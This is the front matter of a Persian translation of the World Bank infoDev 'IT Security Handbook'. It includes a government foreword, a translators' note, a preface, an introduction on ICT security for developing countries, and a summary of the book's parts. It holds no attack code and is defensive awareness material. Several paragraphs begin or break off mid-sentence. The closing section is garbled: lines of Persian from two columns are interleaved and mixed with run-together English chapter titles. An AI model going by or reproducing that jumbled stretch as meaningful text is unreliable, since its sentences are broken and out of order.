GR IT Security Handbook 840707
Authors:
George Sadowsky
James X. Dempsey
Alan Greenberg
Barbara J. Mack
Alan Schwartz
Translators:
Mehdi Mirdamadi
Zahra Shojaei
Mohammad-Javad Samadi
Secretariat of the Supreme Council of Information
Tir 1384
IT Security Handbook / by George Sadowsky ... [et al.]; translated by Mehdi Mirdamadi, Zahra Shojaei, Mohammad-Javad Samadi. -- Tehran: Supreme Council of Information, Secretariat, 1384.
509 p.: tables. 50,000 rials.
ISBN: 964-8846-26-x
Title in English: IT Security Handbook
Cataloguing based on FIPA (pre-publication cataloguing) data.
Bibliography: p. 509; also as footnotes. Index.
1. Information technology -- Security measures. A. Sadowsky, George. B. Mirdamadi, Mehdi, 1359- , translator. C. Shojaei, Zahra, translator. D. Samadi, Mohammad-Javad, translator. E. Supreme Council of Information. Secretariat. F. Title.
۳۰۳/۴۸۳۳ ۱۳۸۴ ۲۳ﺭT۵۸/۵/
The concept of security in the real world has been, and remains, a vital concept and one thoroughly familiar to humankind. In prehistoric times, security was an entirely physical notion, consisting of the basics of survival such as safety against attack by other people or animals, and the security of the food supply. Gradually other needs, such as security against natural disasters or disease and having a place to live and rest without facing danger, were added to humankind's earlier needs. With the advance of civilization and the formation of societies, the scope of security took on much broader dimensions, and with the separation of individuals' property and personal rights from one another and from public property, as well as the definition of national and international territories, it gradually came to include broad concepts such as privacy, social security, financial security, political security, national security and economic security. Although these concepts were no longer entirely limited to humans' physical needs, achieving them mostly still required the existence or use of real, physical environments.
In recent decades, however, and especially in the past five years, the world has been the scene of striking changes that have fundamentally altered many earlier relationships and equations. These changes, made possible by the widespread use of information and communication technology, began with the use of the computer as a tool for automation and increased productivity and, with its use now evolving to create a space of collaborative synergy (collaboration), have in practice transformed the individual and social life of humankind. Many experts believe that, just as the invention of writing had such a profound effect on human destiny that historians were led to divide the story of human life on this planet into prehistory and history, entry into the virtual space created by modern information and communication technology has likewise marked a new era of human civilization, such that the information-age revolution has transformed the ways of thinking, production, consumption, trade, management, communication, war, and even religious practice and love.
This great transformation has brought with it many requirements and consequences, among the most important of which is the emergence of the new concepts of virtual security, or security in cyberspace. Given the change in what the term "computer network" refers to, from a small workgroup network to a vast global network (the Internet), and given the ever-growing volume of interactions and exchanges taking place over computer networks, the need for electronic protection and security systems that guarantee exchanges and create legal obligation for the parties involved is vital. These are systems comprising laws, methods, standards and tools that are even more binding than conventional contracts and traditional methods and that, at the same time, increasingly guarantee the security and privacy of the sensitive information exchanged.
Information security in virtual environments has always been emphasized as one of the basic infrastructures and requirements for the developmental and pervasive use of ICT. Although absolute security is unattainable, whether in the real environment or in virtual space, establishing a level of security that is sufficient and proportionate to the needs and to the investment made is possible under almost all conditions. Only when such an adequate level is in place will individuals, organizations, private companies and government bodies, trusting the various parties that are all involved in an electronic exchange and that have probably never seen or known one another, play their expected role as an effective node of this interactive, synergistic network.
Ensuring that the country's information assets and infrastructure equipment are secure is, beyond its broad national-security dimensions, the key that unlocks countless new commercial and non-commercial opportunities on the Internet. What is certain is that the security challenge facing the country is not a lack of access to technology or an absence of security products, but rather policy-making, culture-building, making proper use of existing resources, and adapting them so that they meet the unique needs of the country's network and digital space. In this regard it is essential to note that information security architecture is one of the ongoing processes within information technology architecture at its various levels, national and organizational, and that in this process the necessary tools will be used as appropriate and as needed. Another important point, drawn from the experience of leading countries, is that information security is a cross-sectoral issue and requires extensive cooperation. This cooperation must be considered at both the national and the international level. Defining roles, duties and responsibilities is among the important points that must be settled in this cooperation.
Today the security of the digital space represents a new facet of every country's national security. It is hoped that, in parallel with the rapid development of the various uses of information and communication technology in different sub-sectors under the TAKFA program, by identifying and designating the country's key infrastructures that depend vitally on information, and then planning, organizing and investing appropriately to protect them, the path of the country's comprehensive development towards a knowledge-based society will be smoothed.
Fortunately, in recent years, following the Cabinet's approval of the Information and Communication Technology Development and Application Program (TAKFA), which reflected the attention and vision of the country's senior leadership in taking a new approach to national development, technical studies and reviews to address security needs and security in computing environments have begun and grown rapidly. The findings of the relevant working group led to the recognition of broader areas of need, and on that basis, with the approval of the Cabinet and the President, the Supreme Council for the Security of the Country's Computer and Internet Environment has begun its work under the responsibility of the First Vice President; God willing, the results of its reviews and decisions will soon be announced in the form of directives and a national document on the security of the country's computing space.
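In continuation of these activities, the Secretariat of the Supreme Council of Information is working to strengthen the country's existing knowledge in the field of information technology by preparing, translating and authoring technical material in a suitable setting. The present book is one of the very useful, comprehensive and recent documents in the field of computer technology security, and it is offered to those involved in ICT in the country.
Nasrollah Jahangard
Secretary of the Supreme Council of Information and
Special Representative of the President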
Translators' Note
The proper use of correct information is one of the most important requirements for organizations to achieve their goals, and the reliability, integrity and availability of that information are among the most important factors in their effectiveness. The advantages of storing information electronically have made the widespread use of computers for business purposes inevitable, and the use of computer networks, especially the Internet, has fundamentally changed the way business is done and has put a huge volume of information just a fingertip away from us; and it goes without saying that in this complex, widely connected environment, extensive risks threaten computer systems, information systems, and the critical activities and infrastructures that depend on them.
In today's world, funds are increasingly moved electronically, information of greater and lesser sensitivity is transferred over networks, computer systems are very rapidly becoming more complex and more connected to the outside world, and simple tools for intrusion and for exploiting vulnerabilities are more available than ever to the adventurers and criminals of the virtual world; each of these factors alone is a strong reason to take security seriously.
The overwhelming majority of organizations are exposed to all kinds of internal and external threats from saboteurs, such as tampering with reference data or theft of critical information and information assets. In such circumstances, factors that can count among the advantages of systems (such as speed and high accessibility) may, if not kept under control, give rise to vulnerabilities, and their abuse by ill-intentioned people may lead to intrusion and sabotage, fraud, or extortion. In addition, natural problems and unintentional errors by computer users can have destructive results in the absence of proper procedures for protecting information.
Alongside all these issues, organized crime in the virtual world adds to the complexity of governments' task of securing the critical infrastructure of public services, and the seriousness of the misuse of government resources doubles the importance of governments addressing security properly and effectively. The latest global statistics on incidents at government and commercial websites caused by viruses, worms and denial-of-service attacks illustrate the vulnerability of these systems well. According to estimates by United States security agencies (the United States being recognized as a leader in information and communication technologies), in 2003 alone the losses resulting from breaches of organizations' security were estimated at more than 10 billion dollars.
Given all this, developing and implementing security measures against these widespread threats is an unavoidable necessity for organizations. Appropriate measures can minimize the likelihood of risks materializing, keep the resulting damage very small if they do, and create the capability for rapid and effective response, so that organizations use predetermined processes to repair damage, the productivity and safety of information increase, and business continues with greater peace of mind.
The "IT Security Handbook" was compiled, once the need to address security had been recognized, at the request of the World Bank by the infoDev group (a part of the World Bank) as an effort to raise the level of information technology security in the member countries of that international institution, and it was first distributed among participants at the first World Summit on the Information Society (WSIS) in Switzerland in December 2003. The contents of this book are the result of reviewing many books, articles, treatises and specialist documents by experts and specialists in this field around the world. A complete list of these references is given in Part Six (Appendices), and readers can consult them to learn of the latest points and topics as well.
Besides presenting a collection of definitions and general security practices, the present book also considers their technical and managerial aspects, and in the original text as well as in its translation an effort has been made, as far as possible, to present the material in such a way that understanding it requires no specialist knowledge of the field and it can be of use to a wide community of information technology users (especially managers); some of its chapters can therefore be used in short-course training seminars.
Worldwide, numerous books have been published in the field of information and communication technology security, and recently a number of them have been translated into Persian by experienced or young translators; but because they usually deal with a specialized topic within security, they lack a high-level, managerial view of the subject. The book before you, taking a high-level view of security, has tried to explain the concepts at issue in each of its areas and, where necessary, has not neglected the technical aspects, although it never goes so far into technical matters as to lose its broad perspective, leaving that to specialized security books.
The translators of this work have always tried to remain faithful in conveying the concepts and points of this book; they have never sacrificed meaning for wording, and in many cases they have coined terms or created equivalents, which is exhausting work that carries responsibility. Other terms for which no Persian equivalent was found or coined have been repeated in the translation in their original form. We hope that readers, whether experts, professors, students or other interested people, will make us aware of any slips and shortcomings in this book with their suggestions and criticism, so that we can set about correcting them.
To avoid confusing readers who have only recently become interested in information security and are not yet very familiar with security terms and their common equivalents, a list of the common security words and terms used in the book, together with the Persian equivalent used for each, has been provided at the end of the book. The page layout also follows that of the original book: except for Part Five, where, because of the large amount of technical text and program listings, the full page width is used for the text, the other parts use a two-column layout.
Finally, we feel obliged to sincerely thank Ms. Maryam Eftekhari and Messrs. Mohammad-Mehdi Jaghouri, Afshin Lamei and Nima Lotfi, who took pains in the preparation of this work; all the professors and experts who encouraged us in this task with their expert and helpful comments; all the colleagues who in some way played a part in preparing and arranging this work; and the Secretariat of the Supreme Council of Information, which undertook the printing and publication of this book.
We hope that this text can have an effect, however small, on the country's progress and development on the way to a prosperous, free and proud Iran.
The translators
Summer 1384
Preface
All funding for the preparation and compilation of this book was provided by the infoDev program of the World Bank Group. In recent years the subject of information technology security has acquired special importance and has for that reason attracted the attention of infoDev's Technical Advisory Panel. We feel obliged here to express our thanks and gratitude to the Swiss State Secretariat for Economic Affairs (SECO) for its attention, not only for funding this project but also for recognizing the urgency of the issue and bringing this book to fruition.
Information and communication technology (ICT) plays an important role in economic and social development, but it should not be forgotten that in an insecure and unreliable environment the effective use of ICT is impossible. IT security therefore has a fundamental and decisive role in creating the conditions needed for the successful implementation of national ICT plans, e-government and e-commerce, and for carrying out projects in education, health, or finance and credit.
IT security is a complex subject and is evolving almost in step with technology. In this book the authors have managed to present the best practices and recommendations, independent of any particular technology, for specific IT environments. Readers can also obtain up-to-date and relevant information by visiting the website www.infodev-security.net and, through this steady flow of information, keep informed of new developments in IT security. Bearing in mind that the material presented in this book does not necessarily reflect the views of infoDev or the World Bank Group, we believe that using this book together with its website can greatly help in understanding IT security issues around the world.
This book consists of five parts, each of which can be read on its own. After a short introduction to general IT security topics, you will find material and discussions suited to individual users, small and medium-sized organizations, government, and technical administrators. Although most published research and articles on IT security are found in developed countries, the authors have tried to provide practical and effective guidelines that can also be used in developing countries.
We hope that the publication of this book and the launch of its website will be the starting point of an interactive process in which practices and technology advance together; and what matters most in this is that the book's readers also share their own suitable and effective methods and practices with others.
Mohsen A. Khalil: Director of the International Information and Communication Technology Department, World Bank Group
Bruno Lanvin: Manager of the infoDev Program, World Bank Group
Michel A. Maechler: Task Manager, Information Development, and Senior Informatics Specialist, World Bank Group
Introduction
cases your computers and information will be safe from unauthorized access, and you will be able to exchange your information securely with others over the network.
This book was prepared at a time when the use of information and communication technology in socio-economic development had reached its peak; moreover, for 40 years or more it had been used within regional or operational projects carried out by dual-purpose or multi-purpose aid centers. The belief that information and communication technology is an important and vital element for launching many development activities is relatively recent, and dates back to the launch of the global Internet in the early 1990s. It was first formally declared within a multi-purpose institution by the infoDev program of the World Bank Group in 1995, with the intellectual backing of the then President of the World Bank, James Wolfensohn, who placed great emphasis on the importance of sharing information in achieving socio-economic development goals. From then on, optimism about socio-economic development grew, partly because of the spread of inexpensive technologies around the world.
In 2001 the G8 member countries established the Digital Opportunity Taskforce Group (DOT). The DOT committee presented the results of its work in a report and called for nine items to be included in the Genoa Plan of Action, all of which were approved and signed by the G8 leaders at the Genoa summit in 2001. The principal members of the DOT committee are the main G8 stakeholders and the governments of developing countries, the private and non-profit sectors, and a host of international organizations. The report contains seven action points as issues vital to building the information society:
(1) Supporting policies
(2) Improving access
(3) Developing human resources
(4) Fostering entrepreneurs and entrepreneurial activity
(5) Participation of developing countries in international conferences on information technology
(6) Use of technology in health
(7) Application software and local content
One outcome of this report was the creation of the U.N. Secretary General's ICT Task Force; another was the formation of the Global Digital Opportunities Initiative, funded by the United Nations Development Program (UNDP), the Accenture Foundation and the Markle Foundation. In addition, dual-purpose institutions are now showing growing attention to information and communication technology in their development plans. Subsequently ITU and UNESCO also put forward plans to hold two world summits, named the World Summit on Information Society (WSIS), in Geneva (December 2003) and Tunis (April 2005).
Information and communication technology can indirectly support many activities in reaching the Millennium Development Goals (MDG). The main IT security policies and their implementation in a country will strengthen the flow of foreign direct investment into that country, and that investment helps provide funding to secure much of its economic infrastructure.
The question now arises of why this book, written primarily for readers in developing countries, is needed. The answer is that security principles are always the same, regardless of whether you are in a developed, developing or undeveloped country, because technologies and the threats related to them can appear from any corner of the world. There are, of course, various ways of securing computers and networks which are undoubtedly not always available and inexpensive in developing countries.
First, it is important to note that computer users and administrators in developed countries have very extensive access to practical and technical information that can help them in various areas of their work. For example, there are many bookshops and libraries that use computers, and so asking for help from others in the same trade is easily possible. When a computer or network runs into trouble, there is a rich set of information channels through which security news and information are sent. Organizations that use computers and networks have help centers, run by technical specialists, that are able to prevent the misuse of organizational resources and to protect them.
Users and technical administrators in developing countries usually lack the ability to provide this level of support. The number of users is small, and little attention is paid to the warnings and solutions that are issued. Organizations that use computers often have a small staff and therefore cannot supervise their own internal technical resources. Often this inattention and inability is due to a lack of sufficient information and knowledge about computer systems and network security, and even groups that have grasped the basic principles usually have difficulty understanding how to adapt technical solutions to the changing and unpredictable conditions of this environment.
In the past, unlimited after-sales service was provided for computers, which were few in number and expensive; but now, given the sheer volume of computers on the market, such service cannot easily be provided. Computer shops and repair centers are usually unaware of problems arising elsewhere in the world, and as a result users and administrators become victims of the development of information relating to technology security.
Network security failures occur in all countries and may even put governments under pressure. Usually many of these failures go unreported, because public knowledge of them can have undesirable results. Governments and organizations in developed countries are generally able to cope with such failures, but the consequences of security failures and problems in developing countries can be far more serious than in developed countries. Besides all this, markets, organizations and governments in developing countries have little inclination to fix security flaws, because they pay no attention to the consequences of large-scale computer intrusions, are unable to analyze the financial losses caused by such attacks, and lack a proper estimate of the time needed to repair the damage (if indeed the damage can be repaired).
Developing countries must treat security as their main priority, because the danger of criminal activity is directed mostly at places that lack adequate controls and are insecure. E-commerce in countries where IT security is less well provided for is a more attractive target for attack. What small or medium-sized organization can survive the theft of its customers' confidential information or business files, or tampering with its key information? Developing countries must improve their capacity in trained human resources and their technology infrastructure so that they are not easy targets for attack by cybercriminals. In this book there is much discussion of the nature of security, because there are differing views on the need for security. People who are concerned about data see the matter as an information security issue; those who deal with the technical mechanisms of storing and transmitting information see it from the viewpoint of system and network security; while others engaged in commerce look at it as a new area of business, generally under the heading of electronic security.
In view of these issues, we have preferred to present all the topics that fall within "IT security", and in this way to address all the mechanisms for storing, processing and transmitting information, hardware, software and the facilitation of communications, with special attention to the security of the information itself. It is important that both information and the mechanisms that process it be protected against misuse.
We have deliberately limited our attention in this book to computers, software and networks, because rich and numerous resources exist for learning the details of other matters, such as fixed and mobile telephony, which are closely related to these issues and are not addressed here. As telephone and computer technologies converge, such matters also become more important. With the advent of Voice over IP and ENUM, digital telephony protocols are also finding ever wider use, and with the advent of 3G technologies, attention must gradually be paid to matters such as their security as well.
This book has been compiled so that it is available at low cost in developing countries too. The aim of publishing this book is not to achieve a large print run, but rather for its contents to be offered on a global website that is dynamic in two respects: first, that its content be kept as up to date as possible, and second, that it provide useful and relevant information to readers seeking information about IT security.
The contents of this book are divided into five different parts, each suited to a particular group of readers. It should be mentioned that common and repeated material can sometimes be found in different parts of the book, because this way many readers can choose to read only the part of the book that is of use to them. Some parts, especially those that describe security and computer users, can be published independently and distributed among the users who need them.
In preparing this book we have had to strike a balance between general principles, specific examples and practical information, and we hope the balance achieved is an appropriate one. Although technical details will change as technology advances and evolves, these principles will always remain constant, and readers can easily understand them from the policy and management standpoint as well as from the technical one. If these principles are properly understood, technical solutions will then readily come within reach.
The reader should note that the authors have used different terms for the subject of security and computers. In general, IT security refers to the following:
(1) Computer security: security in the technical sense in machines, software, data and networks. This term is used mostly in Parts Two and Five, which focus more on the physical, infrastructural and technical dimensions of technology security.
(2) Cyber-security: IT security as it relates to government policy. This term is generally used by government institutions and national policy-makers in documents, laws and research projects, and is more or less synonymous with "Internet security" (a term not used in this book, but sometimes seen in other references).
Both terms refer to aspects of network security and the principles of network policy-making, such as defining privacy, cybercrime, commerce and global communications. The difference between the two terms is not great; rather, as can be seen in many chapters of this book, the security of computers, networks and data is to a large extent bound up with the everyday concepts of security in cyberspace.
In today's fast-moving world, compiling a handbook runs the risk that it becomes obsolete and outdated shortly after publication. To keep the contents of this book up to date, all of its parts are available on a website at www.infodev-security.net so that each can be updated in future. Readers who wish to contribute useful material to the updating of the website can send their suggestions to the e-mail address contact@infodev-security.net.
The compilation of this book would never have been possible without the support of a number of special and important individuals and institutions, among them Simson Garfinkel, who gave important guidance in shaping the initial structure of this book and then helped in identifying and coordinating part of the team that prepared it. Publication of this handbook would not have been possible without his guidance and help. Others include Bruno Lanvin, manager of infoDev, who devoted considerable funds to conveying the relevance and power of creating and distributing information in the field of information and communication technology; and also Jacqueline Dubow, Ellie Alavi, Teri Nachazel and Henri Bretaudeau, all of whom are infoDev managers. We also thank the O'Reilly team, who, with the backing of their company, O'Reilly & Associates, published the following two books: Practical Unix and Internet Security, 3rd edition (Simson Garfinkel, Gene Spafford and Alan Schwartz, 2003) and Web Security, Privacy and Commerce (Simson Garfinkel and Gene Spafford, 2002). These books were used to complete important parts of this handbook, and several sections of them have been reprinted in this handbook with the permission of the authors and publishers.
In addition, over the past ten years O'Reilly & Associates has made tens of thousands of its technical books available to people in developing countries. Readers who have seen the state of books and access to published material in the developing world know how effective and important O'Reilly's contribution has been to these countries' growing technical capacity to get to know, spread and make use of the Internet, and hence to narrowing the digital divide.
We feel obliged to warmly thank the authors of the above-mentioned books for their generous and enthusiastic help in allowing material from their books to be used in parts of this handbook. Their enthusiasm for helping to publish this handbook is the best example of professional cooperation and information sharing in today's new Internet civilization.
Here we must also thank Tom Kellermann, Senior Data Risk Management Specialist in the Treasury Security Team of the World Bank's operational policy department. His writings on electronic financial services, multi-faceted threats and mobile risk management have been used in Part Three of this book.
Max Schnellmann, Switzerland's representative on the Information Development committee at the Chongqing, China meeting in 2002, was also among the first to recognize the importance and usefulness of an IT security handbook for developing countries, and it was his support and recommendations that led to the Swiss government's support of infoDev in publishing this book; we acknowledge his support here.
Michel Maechler also assembled a group of active specialists to compile the contents of this book, and it was these people who offered valuable suggestions for improving the accuracy and relevance of the final version of this book; we thank them here for their constructive guidance, and we also express our thanks and gratitude to everyone involved and all those who helped in the process of printing this book.
This book is neither a tutorial reference for the Unix, Windows or Macintosh operating systems nor a reference for learning system administration; rather, it should be used alongside the administration guides for those systems.
Making extensive changes to computer systems can make supporting them difficult, even if the changes are needed to improve security. For readers' convenience we have pointed to many Internet resources, but readers who use programs and patches suggested on the Internet should exercise caution, because, after changes have been made to systems' kernels, architecture or commands, assessing their security impact at the large scale may simply
Executive Summary
What makes matters worse is that intruders are now able to develop and extend their threats: for example, a combination of viruses, worms and Trojans that can inflict more severe damage on these systems and data. Such damage can be even more dangerous than that from some malicious software (malware). Since all these developments affect technology users worldwide, the best ways of countering the threats they pose can be achieved only through international cooperation.
International cooperation and security in developing countries
IT security is of great importance in developing countries. Clearly the Internet has provided golden opportunities for commerce and communication that were hard even to imagine about ten years ago. Of course, Internet access is not always cheap. The Internet enables users to look at a wide range of subjects, and with it people's communication by e-mail has become far more efficient than traditional postal services. The Internet has also affected the principles of international trade; markets in developing countries can now sell their goods online. Although the number of competitors in the market is still very large, customers can easily see the capabilities and products of competing companies, and they do not need extensive knowledge of the field to do so. Since access to markets beyond geographical borders is very attractive for every economic system, extensive cooperation is needed for the model of an efficient, global networked system to take hold.
Highlights of the book: IT security and developing countries
Highlights of Part One: IT security in the digital age
Part One of the book is an introduction to the general issues of security in the electronic age. People have always been concerned about security, but the invention of computers and networks has changed the way things work. This part outlines the scope of IT security topics, explains the many kinds of improper actions against computers and networks, and introduces the dangers of working with them without taking appropriate security measures. Part One covers the following:
• The digital revolution
• Defining security
• The emergence and growth of the Internet
• An overview of security issues
• Attackers of IT security
Awareness of general IT security issues, such as the existence and spread of particular security threats, will help users, managers and policy-makers to use effective measures to strengthen the safety of their networks at home or at work against security breaches.
Highlights of Part Two: IT security and individual users
Part Two of the book addresses users who use network and computer resources for various purposes at home or at work, and it will of course also be useful for small organizations that are not in a position to define precise IT security policies and administer them at the organizational level. This part describes the basic principles of security for users and offers guidance on techniques that reduce security threats. Some of the topics covered in Part Two are:
• The need for computer and network security; the impact of security breaches;
• Physical security, and support for authentication through user IDs and passwords;
• The types of malicious software and how they spread;
• How e-mail and the Internet work and why they are a vehicle for computer attacks;
• Software tools, including virus scanners, firewalls and remote access tools;
• More advanced concepts, such as the structure of TCP/IP networks and encryption, for interested users.
Part Two fully covers security issues and risk-reduction methods from the technical standpoint. This part looks at security from the home user's point of view, and Part Three from the organizational point of view.
Highlights of Part Three: IT security and organizations
Part Three of this book examines the policy and administration dimensions of security from an organizational perspective. With appropriate security policies adopted and correctly implemented, the risk of a sudden loss of information
• Security risk assessment and security analysis in a typical company;
• Suggested policies and procedures for developing security programs and plans;
• The role of management in securing computers, networks and data;
• Personnel security, including training and awareness, the hiring process, and the use of outside security resources;
• Computer crime, incident reporting and disaster recovery;
• The security threats of wireless technologies for companies; and
• Appendix guidelines and factors that help in designing and implementing appropriate organizational security.
Part Three also gives an overview of policies directly related to commercial, non-profit and government operations in the networked world, and addresses the discussions of specialists and the World Bank's international dialogues on IT security. Part Four raises deeper discussions of general laws and policies in the cyber world, and this
ﻣﺴﺎﺋﻞ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﺟﻬﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﺪ.
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ،ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻠﺘﺮ
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﻲﻛﻨـﺪ ﻭ ﺍﺑـﺰﺍﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺣﻤـﻼﺕ ﻭ ﺍﺻـﻼﺡ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺑـﺮﺍﻱ ﺣﻔـﻆ ﺩﺍﺩﻩﻫـﺎﻱ
ﻣﺤﺮﻣﺎﻧــﻪ ﻭ ﻛﻤــﻚ ﺑــﻪ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻋﻨﺎﻭﻳﻦ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ،ﺑﺎﻳﺪ ﺗﻠﻔﻴﻘـﻲ ﺍﺯ
ﻓﻬﻢ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﻮﺡ ﺩﻭﻟﺘﻲ ﻻﺯﻡ ﺍﺳﺖ .ﻳﻚ ﺩﻭﻟـﺖ ﻋـﻼﻭﻩ ﺑـﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺍﻳﻦ ﺑﺨـﺶ ﺍﺟـﺰﺍﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ،ﺑﺎﻳـﺪ ﻣﺘﻌﻬـﺪ ﺑﺎﺷـﺪ ﻛـﻪ ﻣﺨﺘﻠﻒ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﺆﺛﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎﻳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺧﺘﻦ ﺍﻃﻼﻋــﺎﺕ ﻣﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ،ﺩﻭﻟﺘﻬـﺎ ،ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺯﻳﺮﺳﺎﺧﺘﻲ ﻣﻠﻲ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻧﻘﺶ ﻣﻬﻤـﻲ ﺩﺭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺩ ،ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻨﺎﻗﻀﻲ ﻧﻴﺰ ﻭﺟﻮﺩ
ﺑﺨﺶ ﺳﻮﻡ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻗﻴﻖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺖ ﻣﻠﻲ ﺑﺎﻳﺪ ﻗـﺎﺩﺭ ﺑـﻪ
ﻣﻲﺩﻫﺪ:
ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻗﻮﺍﻧﻴﻦ ﺿﻌﻴﻒ ﺩﻭﻟﺘـﻲ ﺑـﻴﺶ ﺍﺯ
• ﺭﻭﺵ ﻫﺸﺖ ﺭﻛﻨﻲ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ
ﺁﻧﻜﻪ ﺳﻮﺩﻱ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺿـﺮﺭ ﺑـﻪ ﺑـﺎﺭ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ.
ﻣﺤﻴﻄﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺭﺯﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ؛
ﻓﻨﺎﻭﺭﻱ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳـﺪ
ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﻴﻦ ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﺍﺯ
ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺑﺮﺍﻱ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺘﻦ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
12 Authentication
13 Usernames
14 Passwords
16 Disaster Recovery 15 Remote Access Tools
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٢
ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﮔﺴﺘﺮﺵ ﺷﻴﻮﻩ ﻫﺎﻱ ﻧﻮﻳﻦ ﺧﻼﻓﻜﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ
ﺧﺎﻧﮕﻲ ،ﺍﻣﻨﻴﺖ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﭘﻴـﺎﺩﻩ ﺳـﺎﺯﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺗــﻮﺍﺯﻧﻲ ﻣﻨﺎﺳــﺐ ﻣﻴــﺎﻥ ﻣﻌﻴﺎﺭﻫــﺎﻱ ﺗﻘﻨﻴﻨــﻲ ﻭ
